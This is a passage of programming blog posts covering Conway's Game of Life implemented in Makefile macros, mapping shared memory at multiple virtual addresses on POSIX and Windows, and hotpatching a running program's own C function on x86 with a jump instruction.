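# for larger counts it harmlessly clobbers an already-used table entry
$($($(count))) =

result = $($(count))
args   = count=$(result)
loop   = $(MAKE) $(args)

output :
	@printf "$(result)\n"
	@$(loop)
```

Running `make -f countdown.mak` (the filename is arbitrary) prints 5 through 0, one per make invocation, then stops.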

Game of Life

A universal Turing machine has been implemented in Conway’s Game of Life. With all that heavy lifting done, one of the easiest methods today to prove a language’s Turing-completeness is to implement Conway’s Game of Life. Ignoring the criminal inefficiency of it, the Game of Life Turing machine could be run on the Game of Life simulation running on make’s macro assignments.

In the Game of Life program — the one linked at the top of this article — each cell is stored in a macro named xxyy, after its position. The top-left most cell is named 0000, then going left to right, 0100, 0200, etc. Providing input is a matter of assigning each of these macros. I chose X for alive and - for dead, but, as you’ll see, any two characters permitted in macro names would work as well.

$ make 0000=X 0100=- 0200=- 0300=X ...

The next part should be no surprise: The rules of the Game of Life are encoded as a 512-entry lookup table. The key is formed by concatenating the cell’s value along with all its neighbors, with itself in the center.

The “beginning” of the table looks like this:

--------- = -
X-------- = -
-X------- = -
XX------- = -
--X------ = -
X-X------ = -
-XX------ = -
XXX------ = X
---X----- = -
X--X----- = -
-X-X----- = -
XX-X----- = X
# ...

Note: The two right-hand X values here are the cell coming to life (exactly three living neighbors). Computing the next value (n0101) for 0101 is done like so:

n0101 = $($(0000)$(0100)$(0200)$(0001)$(0101)$(0201)$(0002)$(0102)$(0202))

Given these results, constructing the input to the next loop is simple:

args = 0000=$(n0000) 0100=$(n0100) 0200=$(n0200) ...

The display output, to be given to printf, is built similarly:

output = $(n0000)$(n0100)$(n0200)$(n0300)...

In the real version, this is decorated with an ANSI escape code that clears the terminal. The printf interprets the escape byte (\033) so that it doesn’t need to appear literally in the source.

And that’s all there is to it: Conway’s Game of Life running in a Makefile. Life, uh, finds a way.

tags: [ lang compsci ]

Mapping Multiple Memory Views in User Space

Modern operating systems run processes within virtual memory using a piece of hardware called a memory management unit (MMU). The MMU contains a page table that defines how virtual memory maps onto physical memory. The operating system is responsible for maintaining this page table, mapping and unmapping virtual memory to physical memory as needed by the processes it’s running. If a process accesses a page that is not currently mapped, it will trigger a page fault and the execution of the offending thread will be paused until the operating system maps that page.

This functionality allows for a neat hack: A physical memory address can be mapped to multiple virtual memory addresses at the same time. A process running with such a mapping will see these regions of memory as aliased — views of the same physical memory. A store to one of these addresses will simultaneously appear across all of them.

This feature has a number of useful applications.

Both POSIX and Win32 allow user space applications to create these aliased mappings. The original purpose for these APIs is for shared memory between processes, where the same physical memory is mapped into two different processes’ virtual memory. But the OS doesn’t stop us from mapping the shared memory to a different address within the same process.

POSIX Memory Mapping

On POSIX systems (Linux, *BSD, OS X, etc.), the three key functions are shm_open(3), ftruncate(2), and mmap(2).

First, create a file descriptor to shared memory using shm_open. It has very similar semantics to open(2).

int shm_open(const char *name, int oflag, mode_t mode);

The name works much like a filesystem path, but is actually a different namespace (though on Linux it is a tmpfs mounted at /dev/shm). Resources created here (O_CREAT) will persist until explicitly deleted (shm_unlink(3)) or until the system reboots. It’s an oversight in POSIX that a name is required even if we never intend to access it by name. File descriptors can be shared with other processes via fork(2) or through UNIX domain sockets, so a name isn’t strictly required.

OpenBSD introduced shm_mkstemp(3) to solve this problem, but it’s not widely available. On Linux, as of this writing, the O_TMPFILE flag may or may not provide a fix (it’s undocumented).

The portable workaround is to attempt to choose a unique name, open the file with O_CREAT | O_EXCL (either atomically create the file or fail), shm_unlink the shared memory object as soon as possible, then cross our fingers. The shared memory object will still exist (the file descriptor keeps it alive) but will no longer be accessible by name.

int fd = shm_open("/example", O_RDWR | O_CREAT | O_EXCL, 0600);
if (fd == -1)
    handle_error(); // non-local exit

The shared memory object is brand new (O_EXCL) and is therefore of zero size. ftruncate sets it to the desired size. This does not need to be a multiple of the page size. Failing to allocate memory will result in a bus error on access.

size_t size = sizeof(uint32_t);
ftruncate(fd, size);

Finally mmap the shared memory into place just as if it were a file. We can choose an address (aligned to a page) or let the operating system choose one for us (NULL). If we don't plan on making any more mappings, we can also close the file descriptor. The shared memory object will be freed as soon as it is completely unmapped (munmap(2)).

int prot = PROT_READ | PROT_WRITE;
uint32_t *a = mmap(NULL, size, prot, MAP_SHARED, fd, 0);
uint32_t *b = mmap(NULL, size, prot, MAP_SHARED, fd, 0);

At this point both a and b have different addresses but point (via the page table) to the same physical memory. Changes to one are reflected in the other. So this:

*a = 0xdeafbeef;
printf("%p %p 0x%x\n", a, b, *b);

Will print out something like:

0x6ffffff0000 0x6fffffe0000 0xdeafbeef

It’s also possible to do all this only with open(2) and mmap(2) by mapping the same file twice, but you’d need to worry about where to put the file, where it’s going to be backed, and the operating system will have certain obligations about syncing it to storage somewhere. Using POSIX shared memory is simpler and faster.

Windows Memory Mapping

Windows is very similar, but directly supports anonymous shared memory. The key functions are CreateFileMapping and MapViewOfFile.

First create a file mapping object from an invalid handle value. Like POSIX, the word “file” is used without actually involving files.

size_t size = sizeof(uint32_t);
HANDLE h = CreateFileMapping(INVALID_HANDLE_VALUE,
                             NULL, PAGE_READWRITE,
                             0, size, NULL);

There’s no truncate step because the space is allocated at creation time via the two-part size argument.

Then, just like mmap:

uint32_t *a = MapViewOfFile(h, FILE_MAP_ALL_ACCESS, 0, 0, size);
uint32_t *b = MapViewOfFile(h, FILE_MAP_ALL_ACCESS, 0, 0, size);

If I wanted to choose the target address myself, I’d call MapViewOfFileEx instead, which takes the address as additional argument.

From here on it’s the same as above.

Generalizing the API

Having some fun with this, I came up with a general API to allocate an aliased mapping at an arbitrary number of addresses.

int  memory_alias_map(size_t size, size_t naddr, void **addrs);
void memory_alias_unmap(size_t size, size_t naddr, void **addrs);

Values in the address array must either be page-aligned or NULL to allow the operating system to choose, in which case the map address is written to the array.

It returns 0 on success. It may fail if the size is too small (0), too large, too many file descriptors, etc.

Pass the same pointers back to memory_alias_unmap to free the mappings. When called correctly it cannot fail, so there’s no return value.

The full source is here: memalias.c


Starting with the simpler of the two functions, the POSIX implementation looks like so:

void
memory_alias_unmap(size_t size, size_t naddr, void **addrs)
{
    for (size_t i = 0; i < naddr; i++)
        munmap(addrs[i], size);
}

The complex part is creating the mapping:

int
memory_alias_map(size_t size, size_t naddr, void **addrs)
{
    char path[128];
    snprintf(path, sizeof(path), "/%s(%ld,%p)",
             __FUNCTION__, (long)getpid(), addrs);
    int fd = shm_open(path, O_RDWR | O_CREAT | O_EXCL, 0600);
    if (fd == -1)
        return -1;
    shm_unlink(path);  // the fd keeps the object alive
    ftruncate(fd, size);
    for (size_t i = 0; i < naddr; i++) {
        addrs[i] = mmap(addrs[i], size,
                        PROT_READ | PROT_WRITE, MAP_SHARED,
                        fd, 0);
        if (addrs[i] == MAP_FAILED) {
            memory_alias_unmap(size, i, addrs);
            close(fd);
            return -1;
        }
    }
    close(fd);
    return 0;
}

The shared object name includes the process ID and pointer array address, so there really shouldn’t be any non-malicious name collisions, even if called from multiple threads in the same process.

Otherwise it just walks the array setting up the mappings.


The Windows version is very similar.

void
memory_alias_unmap(size_t size, size_t naddr, void **addrs)
{
    (void)size;
    for (size_t i = 0; i < naddr; i++)
        UnmapViewOfFile(addrs[i]);
}
Since Windows tracks the size internally, it’s unneeded and ignored.

int
memory_alias_map(size_t size, size_t naddr, void **addrs)
{
    HANDLE m = CreateFileMapping(INVALID_HANDLE_VALUE,
                                 NULL, PAGE_READWRITE,
                                 0, size, NULL);
    if (m == NULL)
        return -1;
    DWORD access = FILE_MAP_ALL_ACCESS;
    for (size_t i = 0; i < naddr; i++) {
        addrs[i] = MapViewOfFileEx(m, access, 0, 0, size, addrs[i]);
        if (addrs[i] == NULL) {
            memory_alias_unmap(size, i, addrs);
            CloseHandle(m);
            return -1;
        }
    }
    CloseHandle(m);  // the views keep the mapping object alive
    return 0;
}

In the future I’d like to find some unique applications of these multiple memory views.

tags: [ c linux win32 ]

Hotpatching a C Function on x86

In this post I’m going to do a silly, but interesting, exercise that should never be done in any program that actually matters. I’m going to write a program that changes one of its function definitions while it’s actively running and using that function. Unlike last time, this won’t involve shared libraries, but it will require x86_64 and GCC. Most of the time it will work with Clang, too, but Clang is missing an important compiler option that makes this stable.

If you want to see it all up front, here’s the full source: hotpatch.c

Here’s the function that I’m going to change:

void
hello(void)
{
    puts("hello");
}
It’s dead simple, but that’s just for demonstration purposes. This will work with any function of arbitrary complexity. The definition will be changed to this:

void
new_hello(void)
{
    static int x;
    printf("goodbye %d\n", x++);
}

I was only going to change the string, but I figured I should make it a little more interesting.

Here’s how it’s going to work: I’m going to overwrite the beginning of the function with an unconditional jump that immediately moves control to the new definition of the function. It’s vital that the function prototype does not change, since that would be a far more complex problem.

But first there’s some preparation to be done. The target needs to be augmented with some GCC function attributes to prepare it for its redefinition. As is, there are three possible problems that need to be dealt with: the function’s first instructions may be too small to overwrite safely, the function may be misaligned, and GCC may inline or clone it.

The solution to the first is the ms_hook_prologue function attribute. This tells GCC to put a hotpatch prologue on the function: a big, fat, 8-byte NOP that I can safely clobber. This idea originated in Microsoft’s Win32 API, hence the “ms” in the name.

The solution to the second is the aligned function attribute, ensuring the hotpatch prologue is properly aligned so it can be replaced with a single atomic store.

As you might have guessed, the third is primarily fixed with the noinline function attribute. Since GCC may also clone the function and call that instead, it also needs the noclone attribute.

Even further, if GCC determines there are no side effects, it may cache the return value and only ever call the function once. To convince GCC that there’s a side effect, I added an empty inline assembly string (__asm("")). Since puts() has a side effect (output), this isn’t truly necessary for this particular example, but I’m being thorough.

What does the function look like now?

__attribute__ ((ms_hook_prologue))
__attribute__ ((aligned(8)))
__attribute__ ((noinline))
__attribute__ ((noclone))
void
hello(void)
{
    __asm("");  // side effect: prevents caching the result
    puts("hello");
}

And what does the assembly look like?

$ objdump -Mintel -d hotpatch
0000000000400848 <hello>:
  400848:       48 8d a4 24 00 00 00    lea    rsp,[rsp+0x0]
  40084f:       00
  400850:       bf d4 09 40 00          mov    edi,0x4009d4
  400855:       e9 06 fe ff ff          jmp    400660 <puts@plt>

It’s 8-byte aligned and it has the 8-byte NOP: that lea instruction does nothing. It copies rsp into itself and changes no flags. Why not 8 1-byte NOPs? I need to replace exactly one instruction with exactly one other instruction. I can’t have another thread in between those NOPs.


Next, let’s take a look at the function that will perform the hotpatch. I’ve written a generic patching function for this purpose. This part is entirely specific to x86.

void
hotpatch(void *target, void *replacement)
{
    assert(((uintptr_t)target & 0x07) == 0); // 8-byte aligned?
    void *page = (void *)((uintptr_t)target & ~0xfff);
    mprotect(page, 4096, PROT_WRITE | PROT_EXEC);
    uint32_t rel = (char *)replacement - (char *)target - 5;
    union {
        uint8_t bytes[8];
        uint64_t value;
    } instruction = { {0xe9, rel >> 0, rel >> 8, rel >> 16, rel >> 24} };
    *(uint64_t *)target = instruction.value;
    mprotect(page, 4096, PROT_EXEC);
}

It takes the address of the function to be patched and the address of the function to replace it. As mentioned, the target must be 8-byte aligned (enforced by the assert). It’s also important this function is only called by one thread at a time, even on different targets. If that was a concern, I’d wrap it in a mutex to create a critical section.

There are a number of things going on here, so let’s go through them one at a time:

Make the function writeable

The .text segment will not be writeable by default. This is for both security and safety. Before I can hotpatch the function I need to make the function writeable. To make the function writeable, I need to make its page writable. To make its page writeable I need to call mprotect(). If there was another thread monkeying with the page attributes of this page at the same time (another thread calling hotpatch()) I’d be in trouble.

It finds the page by rounding the target address down to the nearest 4096, the assumed page size (sorry, hugepages). Warning: I’m being a bad programmer and not checking the result of mprotect(). If it fails, the program will crash and burn. It will always fail on systems with W^X enforcement, which will likely become the standard in the future. Under W^X (“write XOR execute”), memory can either be writeable or executable, but never both at the same time.

What if the function straddles pages? Well, I’m only patching the first 8 bytes, which, thanks to alignment, will sit entirely inside the page I just found. It’s not an issue.

At the end of the function, I mprotect() the page back to non-writeable.

Create the instruction

I’m assuming the replacement function is within 2GB of the original in virtual memory, so I’ll use a 32-bit relative jmp instruction. There’s no 64-bit relative jump, and I only have 8 bytes to work within anyway. Looking that up in the Intel manual, I see this:

E9 cd    JMP rel32    Jump near, relative, RIP = RIP + 32-bit displacement

Fortunately it’s a really simple instruction. It’s opcode 0xE9 and it’s followed immediately by the 32-bit displacement. The instruction is 5 bytes wide.

To compute the relative jump, I take the difference between the functions, minus 5. Why the 5? The jump address is computed from the position after the jump instruction and, as I said, it’s 5 bytes wide.

I put 0xE9 in a byte array, followed by the little endian displacement. The astute may notice that the displacement is signed (it can go “up” or “down”) and I used an unsigned integer. That’s because it will overflow nicely to the right value and make those shifts clean.

Finally, the instruction byte array I just computed is written over the hotpatch NOP as a single, atomic, 64-bit store.

    *(uint64_t *)target = instruction.value;

Other threads will see either the NOP or the jump, nothing in between. There’s no synchronization, so other threads may continue to execute the NOP for a brief moment even though I’ve clobbered it, but that’s fine.

Trying it out

Here’s what my test program looks like:

void *
worker(void *arg)
{
    (void)arg;
    for (;;) {
        hello();
        usleep(100000);  // brief pause between calls
    }
    return NULL;
}

int
main(void)
{
    pthread_t thread;
    pthread_create(&thread, NULL, worker, NULL);
    getchar();  // wait for enter
    hotpatch(hello, new_hello);
    pthread_join(thread, NULL);
    return 0;
}

I fire off the other thread to keep it pinging at hello(). The main thread waits until I hit enter to give the program input, after which it calls hotpatch() and changes the function called by the worker thread. I’ve now changed the behavior of the worker thread without its knowledge. In a more practical situation, this could be used to update parts of a running program without restarting or even synchronizing.

Further Reading

These related articles have been shared with me since publishing this article:

tags: [ x86 c linux ]